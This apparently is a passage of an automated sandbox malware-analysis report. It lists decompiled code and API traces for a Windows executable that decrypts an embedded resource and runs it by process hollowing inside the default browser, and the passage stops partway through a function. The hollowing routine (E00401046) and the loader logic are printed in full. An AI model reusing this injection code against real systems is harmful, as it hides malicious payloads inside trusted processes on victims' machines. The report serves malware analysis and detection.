        							Sleep( *(_t245 + 8)); // executed
        							if(_v36 == _t324) {
        								E00401046( &_v1128, _v16, GetCommandLineA()); // executed
        								_t333 = _t333 + 0xc;
        							}
        							if(_v12 == _t324) {
        								_t217 = CreateFileA( &_v608, 0xc0000000, _t324, _t324, 2, 2, _t324); // executed
        								if(_t217 != 0xffffffff) {
        									FindCloseChangeNotification(_t217); // executed
        								}
        							}
        							if( *((intOrPtr*)(_t245 + 0xb6)) != _t324 && _v12 == _t324) {
        								_v1388 = _v1388 & 0x00000000;
        								_t270 = 0x40;
        								_v348 = _v348 & 0x00000000;
        								memset( &_v1387, 0, _t270 << 2);
        								asm("stosw");
        								asm("stosb");
        								_push(0x40);
        								memset( &_v347, 0, 0 << 2);
        								_t333 = _t333 + 0x18;
        								asm("stosw");
        								asm("stosb");
        								PathCombineA( &_v348,  &_v868, "MSDefaultBrowser.html");
        								_t203 = CreateFileA( &_v348, 0xc0000000, _t324, _t324, 2, 0x80, _t324);
        								if(_t203 != 0xffffffff) {
        									CloseHandle(_t203);
        									FindExecutableA( &_v348, _t324,  &_v1388);
        									DeleteFileA( &_v348);
        									E00401046( &_v1388,  *((intOrPtr*)(_t245 + 0xb6)) + _v16, _t324);
        									_t333 = _t333 + 0xc;
        									DeleteFileA( &_v348);
        								}
        							}
        							Sleep(0x1f4); // executed
        							_v1648 = _v1648 & 0x00000000;
        							_t268 = 0x40;
        							memset( &_v1647, 0, _t268 << 2);
        							asm("stosw");
        							asm("stosb");
        							PathCombineA( &_v1648,  &_v868, _t245 + 0xc9);
        							DeleteFileA( &_v1648); // executed
        							goto L41;
        						}
        						_v8 = _t283;
        						while(1) {
        							_t275 = 0x1c;
        							_t97 = memcpy(_t187, _v8, _t275 << 2) + 0xc; // 0xc
        							E004011C7( &_v868,  *((intOrPtr*)(_t222 + 8)) + _t283,  *((intOrPtr*)(_t222 + 4)),  *_t222, _t97);
        							_v8 = _v8 + 0x70;
        							_t333 = _t333 + 0x20;
        							_v20 = _v20 + 1;
        							if(_v20 >=  *((intOrPtr*)(_t245 + 0x14))) {
        								break;
        							}
        							_t187 = _v48;
        							_t283 = _v44;
        						}
        						_t324 = 0;
        						goto L31;
        					}
        				}
        			}

        APIs
        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,00000000), ref: 004012E3
        • GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,?,?,00000000), ref: 004012FC
        • GetEnvironmentVariableA.KERNEL32(APPDATA,00000000,00000104,?,?,00000000), ref: 0040130B
        • GetDesktopWindow.USER32 ref: 0040131C
        • PeekMessageA.USER32 ref: 0040132D
        • Sleep.KERNEL32(00000064,?,?,00000000), ref: 00401348
        • IsWindow.USER32(0000000A), ref: 00401353
        • IsDialogMessageA.USER32(0000000A,?,?,?,00000000), ref: 00401364
        • TranslateMessage.USER32(?), ref: 00401372
        • DispatchMessageA.USER32 ref: 0040137C
        • IsDlgButtonChecked.USER32(0000000A,00000007), ref: 00401387
        • GetDesktopWindow.USER32 ref: 0040138D
        • FindResourceA.KERNEL32(00000000,00000001,00000015), ref: 0040139C
        • LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013A2
        • SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013AD
        • LockResource.KERNEL32(?,?,?,00000000), ref: 004013B9
        • FindResourceA.KERNEL32(00000000,00000001,00000014), ref: 004013DF
        • LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013E5
        • SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013F0
        • ??2@YAPAXI@Z.MSVCRT ref: 004013FD
        • LockResource.KERNEL32(?,?,?,00000000), ref: 0040140B
        • PathCombineA.KERNELBASE(00000000,00000000,000000BA,?,?,00000000), ref: 00401439
        • PathFileExistsA.KERNELBASE(00000000,?,?,00000000), ref: 00401446
        • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,?,?,00000000), ref: 00401489
        • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008,?,?,00000000), ref: 0040149D
        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000), ref: 004014AD
        • ??2@YAPAXI@Z.MSVCRT ref: 004014BD
        • ??2@YAPAXI@Z.MSVCRT ref: 004014C7
        • CryptHashData.ADVAPI32(?,00000000,0000000A,00000000,?,?,00000000), ref: 00401504
        • CryptDeriveKey.ADVAPI32(?,00006801,?,00000000,?,?,?,00000000), ref: 0040151A
        • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,004026C0,?,?,?,00000000), ref: 0040152F
        • MessageBoxA.USER32 ref: 0040156B
        • ??2@YAPAXI@Z.MSVCRT ref: 00401589
        • Sleep.KERNELBASE(?,?,?,00000000), ref: 004015EA
        • GetCommandLineA.KERNEL32(?,?,00000000), ref: 004015F5
        • CreateFileA.KERNELBASE(00000000,C0000000,00000000,00000000,00000002,00000002,00000000,?,?,00000000), ref: 00401626
        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00401632
        • PathCombineA.SHLWAPI(00000000,00000000,MSDefaultBrowser.html,?,?,00000000), ref: 0040168E
        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,00000000), ref: 004016AA
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004016B6
        • FindExecutableA.SHELL32(00000000,00000000,00000000), ref: 004016CB
        • DeleteFileA.KERNEL32(00000000,?,?,00000000), ref: 004016DE
          • Part of subcall function 00401046: LoadLibraryA.KERNEL32(kernel32.dll,74B5F7E0,00000000,00000000), ref: 00401057
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,SetThreadContext), ref: 00401091
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,ResumeThread), ref: 0040109E
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 004010AB
          • Part of subcall function 00401046: GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004010BA
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000), ref: 004010C1
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004010CE
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 004010DB
          • Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,GetThreadContext), ref: 004010E8
          • Part of subcall function 00401046: CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
          • Part of subcall function 00401046: NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
          • Part of subcall function 00401046: VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
          • Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
          • Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169
        • DeleteFileA.KERNEL32(00000000,?,?,00000000), ref: 00401701
        • Sleep.KERNELBASE(000001F4,?,?,00000000), ref: 00401708
        • PathCombineA.SHLWAPI(00000000,00000000,-000000C9,?,?,00000000), ref: 0040173A
        • DeleteFileA.KERNELBASE(00000000,?,?,00000000), ref: 00401747
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Resource$AddressFileProc$Crypt$Message$??2@CreateFindPath$CombineDeleteLoadProcessSleepWindow$AcquireCloseContextDesktopEnvironmentHandleHashLockMemoryModuleSizeofVariableWrite$AllocButtonChangeCheckedCommandDataDecryptDeriveDialogDispatchExecutableExistsLibraryLineNameNotificationPeekSectionTranslateUnmapViewVirtual
        • String ID: APPDATA$MSDefaultBrowser.html$Microsoft Base Cryptographic Provider v1.0$TEMP$YGN3456789$p
        • API String ID: 2862719199-2839325405
        • Opcode ID: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
        • Instruction ID: 0dca69b1a13e7b935d10de9f8f5091165e44e57de89191cc5cb1a4d17ae4f859
        • Opcode Fuzzy Hash: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
        • Instruction Fuzzy Hash: 7BE15972901218ABDF21CFA0DD49ADEBBBDFB48311F1040A6F605F6290D7759A44CFA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00401046(CHAR* _a4, SIZE_T* _a8, SIZE_T* _a12) {
        				_Unknown_base(*)()* _v8;
        				_Unknown_base(*)()* _v12;
        				struct _PROCESS_INFORMATION _v28;
        				void _v32;
        				_Unknown_base(*)()* _v36;
        				_Unknown_base(*)()* _v40;
        				_Unknown_base(*)()* _v44;
        				_Unknown_base(*)()* _v48;
        				struct _STARTUPINFOA _v116;
        				struct _CONTEXT _v832;
        				struct HINSTANCE__* _t74;
        				void* _t102;
        				void* _t110;
        				signed int _t111;
        				void* _t120;
        
        				_t74 = LoadLibraryA("kernel32.dll");
        				_t110 = _a8;
        				_v8 = _t74;
        				_t111 = 0x11;
        				_v832.ContextFlags = 0x10007;
        				memset( &_v116, 0, _t111 << 2);
        				_v116.cb = 0x44;
        				_t120 =  *((intOrPtr*)(_t110 + 0x3c)) + _t110;
        				_v44 = GetProcAddress(_v8, "SetThreadContext");
        				_v36 = GetProcAddress(_v8, "ResumeThread");
        				_a8 = GetProcAddress(_v8, "CreateProcessA");
        				_v48 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
        				_v40 = GetProcAddress(_v8, "VirtualAllocEx");
        				_v12 = GetProcAddress(_v8, "WriteProcessMemory");
        				_v8 = GetProcAddress(_v8, "GetThreadContext");
        				CreateProcessA(_a4, _a12, 0, 0, 0, 4, 0, 0,  &_v116,  &_v28);
        				NtUnmapViewOfSection(_v28.hProcess,  *(_t120 + 0x34));
        				_v32 = VirtualAllocEx(_v28.hProcess,  *(_t120 + 0x34),  *(_t120 + 0x50), 0x3000, 0x40);
        				WriteProcessMemory(_v28.hProcess,  *(_t120 + 0x34), _t110,  *(_t120 + 0x54), 0);
        				_a12 = 0;
        				if( *(_t120 + 6) > 0) {
        					_a8 = 0;
        					do {
        						WriteProcessMemory(_v28.hProcess,  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0xf8 + 0xc)) +  *(_t120 + 0x34),  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x10c)) + _t110,  *(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x108), 0);
        						_a12 =  &(_a12[1]);
        						_a8 = _a8 + 0x28;
        					} while (_a12 < ( *(_t120 + 6) & 0x0000ffff));
        				}
        				GetThreadContext(_v28.hThread,  &_v832);
        				WriteProcessMemory(_v28, _v832.Ebx + 8,  &_v32, 4, 0);
        				_v832.Eax =  *((intOrPtr*)(_t120 + 0x28)) +  *(_t120 + 0x34);
        				SetThreadContext(_v28.hThread,  &_v832);
        				ResumeThread(_v28.hThread);
        				_t102 = 1;
        				return _t102;
        			}

        APIs
        • LoadLibraryA.KERNEL32(kernel32.dll,74B5F7E0,00000000,00000000), ref: 00401057
        • GetProcAddress.KERNEL32(00000000,SetThreadContext), ref: 00401091
        • GetProcAddress.KERNEL32(00000000,ResumeThread), ref: 0040109E
        • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 004010AB
        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004010BA
        • GetProcAddress.KERNEL32(00000000), ref: 004010C1
        • GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004010CE
        • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 004010DB
        • GetProcAddress.KERNEL32(00000000,GetThreadContext), ref: 004010E8
        • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169
        • GetThreadContext.KERNELBASE(0000C350,00010007), ref: 00401186
        • WriteProcessMemory.KERNELBASE(00000000,?,004016F7,00000004,00000000), ref: 0040119D
        • SetThreadContext.KERNELBASE(0000C350,00010007), ref: 004011B6
        • ResumeThread.KERNELBASE(0000C350), ref: 004011BC
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$Process$MemoryThreadWrite$Context$AllocCreateHandleLibraryLoadModuleResumeSectionUnmapViewVirtual
        • String ID: ($CreateProcessA$D$GetThreadContext$NtUnmapViewOfSection$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$kernel32.dll$ntdll.dll
        • API String ID: 3906057711-2335503490
        • Opcode ID: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
        • Instruction ID: 59b423de3ce8e75a4fe9c6daadb1354d7465d9fc2d4f27810ddbe7435c117431
        • Opcode Fuzzy Hash: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
        • Instruction Fuzzy Hash: 1751F471900208AFDF219FA5CD49EEEBBB9FF88704F10406AFA05B61A0D7759A50DF64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 40%
        			E00401046(CHAR* _a4, SIZE_T* _a8, SIZE_T* _a12) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				struct _PROCESS_INFORMATION _v28;
        				void _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				struct _STARTUPINFOA _v116;
        				struct _CONTEXT _v832;
        				intOrPtr _t74;
        				intOrPtr _t77;
        				intOrPtr _t78;
        				SIZE_T* _t79;
        				intOrPtr _t81;
        				intOrPtr _t82;
        				intOrPtr _t83;
        				void* _t102;
        				void* _t110;
        				signed int _t111;
        				intOrPtr* _t117;
        				void* _t120;
        
        				_t74 =  *0x403064(0x4040d0);
        				_t110 = _a8;
        				_v8 = _t74;
        				_t111 = 0x11;
        				_v832.ContextFlags = 0x10007;
        				memset( &_v116, 0, _t111 << 2);
        				_t117 =  *0x403070;
        				_v116.cb = 0x44;
        				_t120 =  *((intOrPtr*)(_t110 + 0x3c)) + _t110;
        				_t77 =  *_t117(_v8, 0x4040bc);
        				_v44 = _t77;
        				_t78 =  *_t117(_v8, 0x4040ac);
        				_v36 = _t78;
        				_t79 =  *_t117(_v8, 0x40409c);
        				_a8 = _t79;
        				_t81 =  *_t117( *0x403068(0x404078, 0x404084));
        				_v48 = _t81;
        				_t82 =  *_t117(_v8, 0x404068);
        				_v40 = _t82;
        				_t83 =  *_t117(_v8, 0x404054);
        				_v12 = _t83;
        				_v8 =  *_t117(_v8, 0x404040);
        				CreateProcessA(_a4, _a12, 0, 0, 0, 4, 0, 0,  &_v116,  &_v28);
        				NtUnmapViewOfSection(_v28.hProcess,  *(_t120 + 0x34));
        				_v32 = VirtualAllocEx(_v28.hProcess,  *(_t120 + 0x34),  *(_t120 + 0x50), 0x3000, 0x40);
        				WriteProcessMemory(_v28.hProcess,  *(_t120 + 0x34), _t110,  *(_t120 + 0x54), 0);
        				_a12 = 0;
        				if( *(_t120 + 6) > 0) {
        					_a8 = 0;
        					do {
        						WriteProcessMemory(_v28.hProcess,  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0xf8 + 0xc)) +  *(_t120 + 0x34),  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x10c)) + _t110,  *(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x108), 0);
        						_a12 =  &(_a12[1]);
        						_a8 = _a8 + 0x28;
        					} while (_a12 < ( *(_t120 + 6) & 0x0000ffff));
        				}
        				GetThreadContext(_v28.hThread,  &_v832);
        				WriteProcessMemory(_v28, _v832.Ebx + 8,  &_v32, 4, 0);
        				_v832.Eax =  *((intOrPtr*)(_t120 + 0x28)) +  *(_t120 + 0x34);
        				SetThreadContext(_v28.hThread,  &_v832);
        				ResumeThread(_v28.hThread);
        				_t102 = 1;
        				return _t102;
        			}

        APIs
        • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169
        • GetThreadContext.KERNELBASE(0000C350,00010007), ref: 00401186
        • WriteProcessMemory.KERNELBASE(00000000,?,004016F7,00000004,00000000), ref: 0040119D
        • SetThreadContext.KERNELBASE(0000C350,00010007), ref: 004011B6
        • ResumeThread.KERNELBASE(0000C350), ref: 004011BC
        Strings
        Memory Dump Source
        • Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Process$MemoryThreadWrite$Context$AllocCreateResumeSectionUnmapViewVirtual
        • String ID: ($D
        • API String ID: 3932078547-1229367909
        • Opcode ID: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
        • Instruction ID: 59b423de3ce8e75a4fe9c6daadb1354d7465d9fc2d4f27810ddbe7435c117431
        • Opcode Fuzzy Hash: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
        • Instruction Fuzzy Hash: 1751F471900208AFDF219FA5CD49EEEBBB9FF88704F10406AFA05B61A0D7759A50DF64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			_entry_(void* __ebx, void* __edi, void* __esi) {
        				CHAR* _v8;
        				intOrPtr* _v24;
        				intOrPtr _v28;
        				struct _STARTUPINFOA _v96;
        				int _v100;
        				char** _v104;
        				int _v108;
        				void _v112;
        				char** _v116;
        				intOrPtr* _v120;
        				intOrPtr _v124;
        				intOrPtr* _t23;
        				intOrPtr* _t24;
        				void* _t27;
        				void _t29;
        				intOrPtr _t36;
        				signed int _t38;
        				int _t40;
        				intOrPtr* _t41;
        				intOrPtr _t42;
        				intOrPtr _t46;
        				intOrPtr _t47;
        				intOrPtr _t49;
        				intOrPtr* _t55;
        				intOrPtr _t58;
        				intOrPtr _t61;
        
        				_push(0xffffffff);
        				_push(0x4031a8);
        				_push(0x40275e);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t58;
        				_v28 = _t58 - 0x68;
        				_v8 = 0;
        				__set_app_type(2);
        				 *0x404244 =  *0x404244 | 0xffffffff;
        				 *0x404248 =  *0x404248 | 0xffffffff;
        				_t23 = __p__fmode();
        				_t46 =  *0x404238; // 0x0
        				 *_t23 = _t46;
        				_t24 = __p__commode();
        				_t47 =  *0x404234; // 0x0
        				 *_t24 = _t47;
        				 *0x404240 = _adjust_fdiv;
        				_t27 = E0040275D( *_adjust_fdiv);
        				_t61 =  *0x404228; // 0x1
        				if(_t61 == 0) {
        					__setusermatherr(E0040275A);
        				}
        				E00402748(_t27);
        				_push(0x404014);
        				_push(0x404010);
        				L00402742();
        				_t29 =  *0x404230; // 0x0
        				_v112 = _t29;
        				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40422c,  &_v112);
        				_push(0x40400c);
        				_push(0x404000); // executed
        				L00402742(); // executed
        				_t55 =  *_acmdln;
        				_v120 = _t55;
        				if( *_t55 != 0x22) {
        					while( *_t55 > 0x20) {
        						_t55 = _t55 + 1;
        						_v120 = _t55;
        					}
        				} else {
        					do {
        						_t55 = _t55 + 1;
        						_v120 = _t55;
        						_t42 =  *_t55;
        					} while (_t42 != 0 && _t42 != 0x22);
        					if( *_t55 == 0x22) {
        						L6:
        						_t55 = _t55 + 1;
        						_v120 = _t55;
        					}
        				}
        				_t36 =  *_t55;
        				if(_t36 != 0 && _t36 <= 0x20) {
        					goto L6;
        				}
        				_v96.dwFlags = 0;
        				GetStartupInfoA( &_v96);
        				if((_v96.dwFlags & 0x00000001) == 0) {
        					_t38 = 0xa;
        				} else {
        					_t38 = _v96.wShowWindow & 0x0000ffff;
        				}
        				_push(_t38);
        				_push(_t55);
        				_push(0);
        				_push(GetModuleHandleA(0)); // executed
        				_t40 = E00401282(); // executed
        				_v108 = _t40;
        				exit(_t40); // executed
        				_t41 = _v24;
        				_t49 =  *((intOrPtr*)( *_t41));
        				_v124 = _t49;
        				_push(_t41);
        				_push(_t49);
        				L0040273C();
        				return _t41;
        			}

        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
        • String ID:
        • API String ID: 801014965-0
        • Opcode ID: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
        • Instruction ID: 6f568f106f0c5193084e1fa47d590620f0c2c7fc96d50e62ecd6fd4fccb52519
        • Opcode Fuzzy Hash: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
        • Instruction Fuzzy Hash: 2B4171B1941304AFDB209FA4DA49AAABFB8EB49711F20053FF541B73E5C7B84941CB18
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • PathCombineA.KERNELBASE(00000000,00000000,000000BA,?,?,00000000), ref: 00401439
        • PathFileExistsA.KERNELBASE(00000000,?,?,00000000), ref: 00401446
        • Sleep.KERNELBASE(?,?,?,00000000), ref: 004015EA
        • CreateFileA.KERNELBASE(00000000,C0000000,00000000,00000000,00000002,00000002,00000000,?,?,00000000), ref: 00401626
        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00401632
        • Sleep.KERNELBASE(000001F4,?,?,00000000), ref: 00401708
        • DeleteFileA.KERNELBASE(00000000,?,?,00000000), ref: 00401747
          • Part of subcall function 00401046: CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
          • Part of subcall function 00401046: NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
          • Part of subcall function 00401046: VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
          • Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
          • Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169
        Strings
        Memory Dump Source
        • Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileProcess$CreateMemoryPathSleepWrite$AllocChangeCloseCombineDeleteExistsFindNotificationSectionUnmapViewVirtual
        • String ID: p
        • API String ID: 568926916-2181537457
        • Opcode ID: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
        • Instruction ID: 0dca69b1a13e7b935d10de9f8f5091165e44e57de89191cc5cb1a4d17ae4f859
        • Opcode Fuzzy Hash: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
        • Instruction Fuzzy Hash: 7BE15972901218ABDF21CFA0DD49ADEBBBDFB48311F1040A6F605F6290D7759A44CFA8
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: __dllonexit_onexit
        • String ID:
        • API String ID: 2384194067-0
        • Opcode ID: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
        • Instruction ID: 0746876295c9db5c40648a75900faa414fd9ba57d79639dc2df41df903a86600
        • Opcode Fuzzy Hash: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
        • Instruction Fuzzy Hash: 52C012B5640200BACA102B10FE0A5467751E7D0776B7043BEF265310F087791610AA0E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 25%
        			_entry_(void* __ebx, void* __edi, void* __esi) {
        				signed char _v8;
        				intOrPtr* _v24;
        				intOrPtr _v28;
        				signed short _v48;
        				signed char _v52;
        				char _v96;
        				char _v100;
        				char _v104;
        				int _v108;
        				char _v112;
        				char _v116;
        				intOrPtr* _v120;
        				intOrPtr _v124;
        				void* _t27;
        				intOrPtr _t36;
        				signed int _t39;
        				int _t41;
        				intOrPtr* _t42;
        				intOrPtr _t43;
        				intOrPtr _t50;
        				intOrPtr* _t56;
        				void* _t57;
        				intOrPtr _t59;
        
        				 *[fs:0x0] = _t59;
        				_v28 = _t59 - 0x68;
        				_v8 = 0;
        				 *0x403088(2, __edi, __esi, __ebx,  *[fs:0x0], 0x40275e, 0x4031a8, 0xffffffff, _t57);
        				 *0x404244 =  *0x404244 | 0xffffffff;
        				 *0x404248 =  *0x404248 | 0xffffffff;
        				 *((intOrPtr*)( *0x40308c())) =  *0x404238;
        				 *((intOrPtr*)( *0x403090())) =  *0x404234;
        				 *0x404240 =  *((intOrPtr*)( *0x403094));
        				_t27 = E0040275D( *((intOrPtr*)( *0x403094)));
        				if( *0x404228 == 0) {
        					_t27 =  *0x403098(E0040275A);
        				}
        				E00402748(_t27);
        				L00402742();
        				_v112 =  *0x404230;
        				 *0x4030a8( &_v100,  &_v116,  &_v104,  *0x40422c,  &_v112, 0x404010, 0x404014);
        				_push(0x40400c);
        				_push(0x404000); // executed
        				L00402742(); // executed
        				_t56 =  *((intOrPtr*)( *0x4030ac));
        				_v120 = _t56;
        				if( *_t56 != 0x22) {
        					while( *_t56 > 0x20) {
        						_t56 = _t56 + 1;
        						_v120 = _t56;
        					}
        				} else {
        					do {
        						_t56 = _t56 + 1;
        						_v120 = _t56;
        						_t43 =  *_t56;
        					} while (_t43 != 0 && _t43 != 0x22);
        					if( *_t56 == 0x22) {
        						L6:
        						_t56 = _t56 + 1;
        						_v120 = _t56;
        					}
        				}
        				_t36 =  *_t56;
        				if(_t36 != 0 && _t36 <= 0x20) {
        					goto L6;
        				}
        				_v52 = 0;
        				 *0x403058( &_v96);
        				if((_v52 & 0x00000001) == 0) {
        					_t39 = 0xa;
        				} else {
        					_t39 = _v48 & 0x0000ffff;
        				}
        				_push( *0x403068(0, 0, _t56, _t39)); // executed
        				_t41 = E00401282(); // executed
        				_v108 = _t41;
        				exit(_t41); // executed
        				_t42 = _v24;
        				_t50 =  *((intOrPtr*)( *_t42));
        				_v124 = _t50;
        				_push(_t42);
        				_push(_t50);
        				L0040273C();
        				return _t42;
        			}

        APIs
        • exit.KERNELBASE(00000000,00000000,?,0000000A), ref: 004026C4
        Memory Dump Source
        • Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: exit
        • String ID:
        • API String ID: 2483651598-0
        • Opcode ID: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
        • Instruction ID: 6f568f106f0c5193084e1fa47d590620f0c2c7fc96d50e62ecd6fd4fccb52519
        • Opcode Fuzzy Hash: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
        • Instruction Fuzzy Hash: 2B4171B1941304AFDB209FA4DA49AAABFB8EB49711F20053FF541B73E5C7B84941CB18
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • _onexit.KERNELBASE(?,00402523,?,00401775,004024E6), ref: 004024FB
        Memory Dump Source
        • Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: _onexit
        • String ID:
        • API String ID: 572287377-0
        • Opcode ID: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
        • Instruction ID: 0746876295c9db5c40648a75900faa414fd9ba57d79639dc2df41df903a86600
        • Opcode Fuzzy Hash: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
        • Instruction Fuzzy Hash: 52C012B5640200BACA102B10FE0A5467751E7D0776B7043BEF265310F087791610AA0E
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 73%
        			E004018F0(void* __ecx, void* __eflags, char _a4, signed int _a8, void* _a12, int _a16, int _a20, int _a24, long _a28, void* _a32, CHAR* _a36, void _a40, int _a44, intOrPtr _a48, char _a52, intOrPtr _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, int _a72, char _a76, void _a77, char _a95, char _a1076, void _a1077, char _a2076, void _a2077, char _a3076, void _a3077, char _a4076, void _a4077, char _a5100, void _a5101, void _a6124, void _a6125, intOrPtr _a6136, intOrPtr _a6140, intOrPtr _a6144, intOrPtr _a6148, char _a16116, int _a16124, intOrPtr* _a16140) {
        				CHAR** _v0;
        				int _v4;
        				int _v8;
        				char _v9;
        				int _v12;
        				signed int _v16;
        				signed int _v17;
        				intOrPtr _v20;
        				CHAR* _t110;
        				CHAR* _t111;
        				long _t117;
        				char _t140;
        				CHAR* _t144;
        				CHAR* _t145;
        				CHAR* _t149;
        				intOrPtr _t154;
